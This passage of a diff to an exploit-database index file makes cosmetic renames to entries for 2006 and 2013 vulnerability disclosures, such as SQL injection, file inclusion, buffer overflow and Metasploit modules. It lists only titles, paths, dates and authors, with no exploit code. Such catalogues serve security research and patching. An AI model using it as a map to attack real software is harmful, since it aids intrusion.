Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 +27815,platforms/asp/webapps/27815.txt,"CyberBuild - 'login.asp' sessionid Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27816,platforms/asp/webapps/27816.txt,"CyberBuild - browse0.htm ProductIndex Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27817,platforms/asp/webapps/27817.txt,"CyberBuild - result.asp Multiple Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - 'index.php' SQL Injection",2006-05-04,almaster,php,webapps,0 @@ -24922,10 +24923,10 @@ id,file,description,date,author,platform,type,port 27820,platforms/windows/remote/27820.txt,"Cryptomathic - ActiveX Control Remote Buffer Overflow",2006-05-05,"Dennis Rand",windows,remote,0 27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 - Validate.php HTML Injection",2006-05-06,"Kamil Sienicki",php,webapps,0 27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 - BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 -27823,platforms/php/webapps/27823.txt,"OpenEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 +27823,platforms/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 - 'index.php' Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/view.asp SearchFor Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/view.asp searchFor Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/edit.asp ID Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter Cross-Site Scripting",2006-05-08,dj_eyes2005,asp,webapps,0 27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script - admin.php Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 @@ -24996,13 +24997,13 @@ id,file,description,date,author,platform,type,port 27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 - profile.asp get Parameter Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - default.asp SQL Injection",2006-05-19,omnipresent,asp,webapps,0 27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 - DC.php SQL Injection",2006-05-19,Luny,php,webapps,0 -27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 - Log.php Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 +27900,platforms/php/webapps/27900.txt,"Artmedic NewsLetter 4.1 - Log.php Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 - Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",linux,remote,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,linux,dos,0 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x - Lang Parameter Multiple Remote File Inclusion",2006-05-26,beford,php,webapps,0 -27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 +27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 - show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 - Guestbook index.php Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27909,platforms/php/webapps/27909.txt,"Chipmunk Directory - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 @@ -25024,25 +25025,25 @@ id,file,description,date,author,platform,type,port 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0 27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,php,webapps,0 27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusion",2005-05-31,ERNE,php,webapps,0 -27928,platforms/php/webapps/27928.txt,"OSTicket 1.x - Open_form.php Remote File Inclusion",2006-05-31,Sweet,php,webapps,0 +27928,platforms/php/webapps/27928.txt,"osTicket 1.x - Open_form.php Remote File Inclusion",2006-05-31,Sweet,php,webapps,0 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 - Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0 27931,platforms/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",multiple,remote,0 -27932,platforms/asp/webapps/27932.txt,"Hogstorps GuestBook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 +27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 27933,platforms/php/webapps/27933.txt,"Tekno.Portal - Bolum.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - content.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 - publication_index.php tf_lang Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 - group_index.php Multiple Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 - user_index.php tf_lastname Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 - list_index.php Multiple Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 -28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 - 'index.php' Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 +28394,platforms/php/webapps/28394.pl,"Fusionphp Fusion News 3.7 - 'index.php' Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Firefox - XMLSerializer Use-After-Free",2013-08-29,Metasploit,windows,remote,0 27941,platforms/php/remote/27941.rb,"SPIP - connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 27943,platforms/windows/remote/27943.txt,"Oracle Java - ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 -27944,platforms/osx/local/27944.rb,"Mac OSX - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 +27944,platforms/osx/local/27944.rb,"Apple Mac OS X - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 @@ -25056,16 +25057,16 @@ id,file,description,date,author,platform,type,port 27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Inclusion",2006-06-02,ERNE,php,webapps,0 -27958,platforms/php/webapps/27958.txt,"DeltaScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 +27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0 27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - template.php Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 -27962,platforms/php/webapps/27962.txt,"IBWd GuestBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 +27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0 -27965,platforms/osx/local/27965.py,"OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 -27992,platforms/unix/remote/27992.txt,"FreeType - .TTF File Remote Buffer Overflow",2006-06-08,"Josh Bressers",unix,remote,0 -27993,platforms/multiple/dos/27993.txt,"FreeType - .TTF File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0 +27965,platforms/osx/local/27965.py,"Apple Mac OS X 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 +27992,platforms/unix/remote/27992.txt,"FreeType - '.TTF' File Remote Buffer Overflow",2006-06-08,"Josh Bressers",unix,remote,0 +27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0 27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 - UserName SQL Injection",2006-06-05,FarhadKey,php,webapps,0 27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - comments.php SQL Injection",2006-06-05,ajann,php,webapps,0 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0 @@ -25128,8 +25129,8 @@ id,file,description,date,author,platform,type,port 28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - search.php Cross-Site Scripting",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 - 'index.php' Cross-Site Scripting",2006-03-06,alijsb,php,webapps,0 28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 - Malformed VMX File Denial of Service",2006-06-19,n00b,multiple,dos,0 -28066,platforms/php/webapps/28066.txt,"singapore 0.9.x/0.10 - Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 -28067,platforms/php/webapps/28067.txt,"singapore 0.9.x/0.10 - 'index.php' template Parameter Cross-Site Scripting",2006-06-19,simo64,php,webapps,0 +28066,platforms/php/webapps/28066.txt,"Singapore 0.9.x/0.10 - Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 +28067,platforms/php/webapps/28067.txt,"Singapore 0.9.x/0.10 - 'index.php' template Parameter Cross-Site Scripting",2006-06-19,simo64,php,webapps,0 28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - mail/index.php id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - mail/reply.php id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28070,platforms/php/webapps/28070.txt,"V3 Chat Instant Messenger - online.php site_id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 @@ -25137,14 +25138,14 @@ id,file,description,date,author,platform,type,port 28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger - profile.php site_id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - profileview.php membername Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - expire.php cust_name Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 +28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List manipulation",2006-06-20,Luny,php,webapps,0 28076,platforms/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - member.php Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x - Parse_User_ID Remote Buffer Overflow",2006-06-20,"Evgeny Legerov",linux,dos,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 - Subject field HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - '.wav' Crash (PoC)",2013-09-04,ariarat,windows,dos,0 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - '.wav' Crash (PoC)",2013-09-04,ariarat,windows,dos,0 -28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 +28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,Metasploit,windows,remote,0 28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 @@ -25160,7 +25161,7 @@ id,file,description,date,author,platform,type,port 28096,platforms/php/webapps/28096.txt,"SoftBiz Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 -28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - jscript.dll Non-Ascii Character Denial of Service",2006-06-23,"Ivan Ivan",windows,dos,0 +28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - jscript.dll Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",windows,dos,0 28100,platforms/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm' Denial of Service",2006-06-23,"Tan Chew Keong",cfm,dos,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 @@ -25179,7 +25180,7 @@ id,file,description,date,author,platform,type,port 28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - admin.php Remote File Inclusion",2006-06-27,botan,php,webapps,0 -28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 - OuterHTML Redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 +28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 - OuterHTML redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 28119,platforms/php/webapps/28119.txt,"vCard PRO - gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28121,platforms/php/webapps/28121.txt,"vCard PRO - create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 @@ -25187,14 +25188,14 @@ id,file,description,date,author,platform,type,port 28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 -28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 +28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL",2013-09-06,Metasploit,windows,local,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO - inc/rss_feed.php category Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 -28135,platforms/osx/dos/28135.pl,"Apple Mac OSX 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos,0 +28135,platforms/osx/dos/28135.pl,"Apple Mac OS X 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos,0 28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.php SQL Injection",2006-06-23,DarkFig,php,webapps,0 28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - insertmember.php city Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - lostpassword.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 @@ -25203,8 +25204,8 @@ id,file,description,date,author,platform,type,port 28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - top.php Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0 28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - Category.php SQL Injection",2006-07-01,black-code,php,webapps,0 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0 -28144,platforms/windows/dos/28144.txt,"Microsoft Internet Explorer 6.0 - OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,windows,dos,0 -28145,platforms/windows/dos/28145.html,"Microsoft Internet Explorer 6.0 - ADODB.Recordset Filter Property Denial of Service",2006-07-03,hdm,windows,dos,0 +28144,platforms/windows/dos/28144.txt,"Microsoft Internet Explorer 6 - OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,windows,dos,0 +28145,platforms/windows/dos/28145.html,"Microsoft Internet Explorer 6 - ADODB.Recordset Filter Property Denial of Service",2006-07-03,hdm,windows,dos,0 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0 28147,platforms/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php' _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28148,platforms/php/webapps/28148.txt,"Plume CMS 1.0.4 - rss.php _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 @@ -25223,7 +25224,7 @@ id,file,description,date,author,platform,type,port 28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x - comments.php Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0 28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 - 'index.php' Remote File Inclusion",2006-07-04,black-code,php,webapps,0 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 -28164,platforms/windows/dos/28164.html,"Microsoft Internet Explorer 6.0 - Href Title Denial of Service",2006-07-04,jsz,windows,dos,0 +28164,platforms/windows/dos/28164.html,"Microsoft Internet Explorer 6 - Href Title Denial of Service",2006-07-04,jsz,windows,dos,0 28165,platforms/osx/dos/28165.html,"Apple Safari Web Browser 2.0.4 - DHTML SetAttributeNode() Null Dereference Denial of Service",2006-07-05,"Dennis Cox",osx,dos,0 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php' Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0 28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injections",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 @@ -25231,7 +25232,7 @@ id,file,description,date,author,platform,type,port 28169,platforms/windows/dos/28169.html,"Microsoft Internet Explorer 5.0.1/6.0 - Structured Graphics Control Denial of Service",2006-07-06,hdm,windows,dos,0 28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 - PASS Command SEH Overflow (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0 -28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - stylesheet.php mosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 +28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - Stylesheet.php MosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0 28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 @@ -25243,35 +25244,35 @@ id,file,description,date,author,platform,type,port 28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service",2006-07-06,tuergeist,multiple,dos,0 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,windows,remote,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 -28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - (search.php cat_id parameter) SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 +28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - (search.php cat_id Parameter) SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 -28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 - ExtCalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 +28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - Extcalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 28193,platforms/asp/webapps/28193.txt,"Webvizyon - SayfalaAltList.asp SQL Injection",2006-07-08,StorMBoY,asp,webapps,0 28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0 28195,platforms/php/webapps/28195.txt,"RW::Download - stats.php Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0 -28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6.0 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0 -28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6.0 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0 +28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0 +28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 28199,platforms/php/webapps/28199.txt,"phpBB 1.2.4 For Mambo - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - Tiny_mce_gzip.php Directory Traversal",2006-07-10,armin390,php,webapps,0 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 -28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6.0 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 +28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x - error.asp Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps,0 28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 - add.php SQL Injection",2006-07-11,C.B.B.L,php,webapps,0 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site 